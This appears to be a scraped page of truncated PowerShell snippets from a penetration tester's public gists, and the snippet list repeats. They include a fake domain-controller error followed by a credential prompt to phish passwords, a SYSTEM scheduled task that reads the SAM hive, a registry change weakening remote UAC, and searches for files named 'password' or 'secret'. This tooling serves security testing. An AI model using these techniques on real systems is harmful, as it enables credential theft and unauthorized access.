Will HarmJ0y

## rotate.ps1
function Rotate-Byte {
<#
    .SYNOPSIS

        Performs left/right binary rotation on individual bytes.
        Author: @harmj0y

    .DESCRIPTION

        Implements the logic to perform per-byte binary rotates right and left.

## ShareAudit.ps1
#requires -version 2

<#

    PowerSploit File: PowerView.ps1
    Author: Will Schroeder (@harmj0y)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None

## dc_cert_template.ps1
$Results = ([adsisearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))").FindAll() | % {
    $Entry = $_.GetDirectoryEntry()

    $SAM = $Entry.samAccountName[0]
    $DN = $Entry.distinguishedName[0]

    try {
        $Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 @($Entry.userCertificate)
        $Exp = $Cert.GetExpirationDateString()

## wmi_dns.ps1
Get all zones:
    Get-WmiObject MicrosoftDNS_Zone -Namespace Root\MicrosoftDNS -ComputerName primary.testlab.local | Select ContainerName

Get all A records from a zone:
    Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT * FROM MicrosoftDNS_ResourceRecord WHERE ContainerName='testlab.local'" -ComputerName primary.testlab.local | ?{$_.TextRepresentation -match " A "} | Select -Expand TextRepresentation


## Powershell-File-Listings.txt
# all files in sortable csv
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue | where {!$_.PSIsContainer} | select-object FullName, @{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}}, LastAccessTime, LastWriteTime, Length | export-csv -notypeinformation -path files.csv"

# grep for specific file types
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*.doc*','*.xls*','*.pdf')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv"

# grep for specific key words in file names
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*password*','*sensitive*','*secret*')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv"

## psremoting.ps1
#Run winrm quickconfig defaults
echo Y | winrm quickconfig

#Run enable psremoting command with defaults
Enable-PSRemoting -force

# adjust local token filter policy
Set-ItemProperty –Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System –Name LocalAccountTokenFilterPolicy –Value 1 -Type DWord

#Enabled Trusted Hosts for Universial Access

## Invoke-WdigestDowngrade.ps1
function Invoke-LockWorkStation {
    # region define P/Invoke types dynamically
    #   stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1
    #   thanks matt and chris :)
    $DynAssembly = New-Object System.Reflection.AssemblyName('Win32')
    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)

    $TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class')
    $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))

## prompt.ps1
# Stolen/adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
#   POC from greg.foss[at]owasp.org

function prompt {

    Add-Type -AssemblyName Microsoft.VisualBasic
    [Microsoft.VisualBasic.Interaction]::MsgBox('Lost contact with the Domain Controller.', 'OKOnly,MsgBoxSetForeground,SystemModal,Critical', 'ERROR - 0xA801B720')

    $c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
    $credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")

## random.ps1
$megs=1000;$w=New-Object IO.streamWriter $env:temp\data.dat;[char[]]$c='azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN0123456789-_';1..$megs|ForEach-Object{1..4|ForEach-Object{$r=$c|Get-Random -Count $c.Count;$s=-join $r;$w.Write($s*4kb);}};

## findsid.bat
schtasks /create /tn GetSid /tr "powershell.exe -c '$k=Get-Item HKLM:\security\sam\domains\account;$v=Get-ItemProperty $k.pspath;New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$v.V[-24..-1],0)|Format-List *|Out-File c:\sid.txt'" /sc minute /ru System /MO 1 & choice /C X /T 60 /D X > nul & schtasks /delete /tn GetSid /f
	function Rotate-Byte {
	<#
	.SYNOPSIS

	Performs left/right binary rotation on individual bytes.
	Author: @harmj0y

	.DESCRIPTION

	Implements the logic to perform per-byte binary rotates right and left.
	#requires -version 2

	<#

	PowerSploit File: PowerView.ps1
	Author: Will Schroeder (@harmj0y)
	License: BSD 3-Clause
	Required Dependencies: None
	Optional Dependencies: None
	$Results = ([adsisearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))").FindAll() \| % {
	$Entry = $_.GetDirectoryEntry()

	$SAM = $Entry.samAccountName[0]
	$DN = $Entry.distinguishedName[0]

	try {
	$Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 @($Entry.userCertificate)
	$Exp = $Cert.GetExpirationDateString()
	Get all zones:
	Get-WmiObject MicrosoftDNS_Zone -Namespace Root\MicrosoftDNS -ComputerName primary.testlab.local \| Select ContainerName

	Get all A records from a zone:
	Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT * FROM MicrosoftDNS_ResourceRecord WHERE ContainerName='testlab.local'" -ComputerName primary.testlab.local \| ?{$_.TextRepresentation -match " A "} \| Select -Expand TextRepresentation
	# all files in sortable csv
	powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue \| where {!$_.PSIsContainer} \| select-object FullName, @{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}}, LastAccessTime, LastWriteTime, Length \| export-csv -notypeinformation -path files.csv"

	# grep for specific file types
	powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('.doc','.xls','*.pdf')\|where{!$_.PSIsContainer}\|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length\|export-csv -notypeinformation -path files.csv"

	# grep for specific key words in file names
	powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('password','sensitive','secret')\|where{!$_.PSIsContainer}\|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length\|export-csv -notypeinformation -path files.csv"
	#Run winrm quickconfig defaults
	echo Y \| winrm quickconfig

	#Run enable psremoting command with defaults
	Enable-PSRemoting -force

	# adjust local token filter policy
	Set-ItemProperty –Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System –Name LocalAccountTokenFilterPolicy –Value 1 -Type DWord

	#Enabled Trusted Hosts for Universial Access
	function Invoke-LockWorkStation {
	# region define P/Invoke types dynamically
	# stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1
	# thanks matt and chris :)
	$DynAssembly = New-Object System.Reflection.AssemblyName('Win32')
	$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
	$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)

	$TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class')
	$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
	# Stolen/adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
	# POC from greg.foss[at]owasp.org

	function prompt {

	Add-Type -AssemblyName Microsoft.VisualBasic
	[Microsoft.VisualBasic.Interaction]::MsgBox('Lost contact with the Domain Controller.', 'OKOnly,MsgBoxSetForeground,SystemModal,Critical', 'ERROR - 0xA801B720')

	$c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
	$credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")